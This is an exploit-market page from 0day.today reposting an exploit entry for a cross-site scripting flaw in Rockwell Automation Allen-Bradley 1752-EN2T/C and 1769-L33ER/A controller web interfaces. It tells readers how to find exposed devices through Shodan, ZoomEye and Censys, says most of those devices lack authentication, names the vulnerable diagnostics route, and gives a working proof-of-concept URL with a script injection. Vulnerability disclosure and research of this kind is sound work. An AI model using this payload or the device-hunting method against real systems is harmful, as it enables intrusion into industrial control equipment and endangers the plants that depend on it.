[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Rockwell Automation Allen-Bradley 1752-EN2T/C, 1769-L33ER/A Cross Site Scripting Vulnerability

Author
n4pst3r
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31745
Category
web applications
Date add
05-12-2018
Platform
hardware
################################
# Exploit Title: Rockwell Automation Allen-Bradley 1752-EN2T/C, 1769-L33ER/A LOGIX5333ER Cross Site Scripting
# Google Dork: N/A
# Date: 5/12/2018
# Exploit Author: n4pst3r
# Vendor Homepage: https://www.rockwellautomation.com/
# Software Link: unkn0wn
# Version: 1752-EN2T/C, 1769-L33ER/A LOGIX5333ER
# Tested on: Embedded Linux, owned by https://www.rockwellautomation.com/
# CVE : n/a
################################

* On the Rockwell Automation website Allen-Bradley 1752-EN2T / C and 1769-L33ER / A LOGIX5333ER
* A user can find devices online, searching "Shodan.io" "zoomeye.org" and "censys.io".
* Most of these devices do not have an authentication system, so access to the platform is easy.
* Attackers can inject malicious XSS code into various parameters of the route: Diagnostics => Advanced Diagnostics => Micellaneous => system Data

################################
PoC:

http://127.0.0.1/rokform/SysDataDetail?name=<script>alert("XSS")</script>Assert

################################


#  0day.today [2024-11-16]  #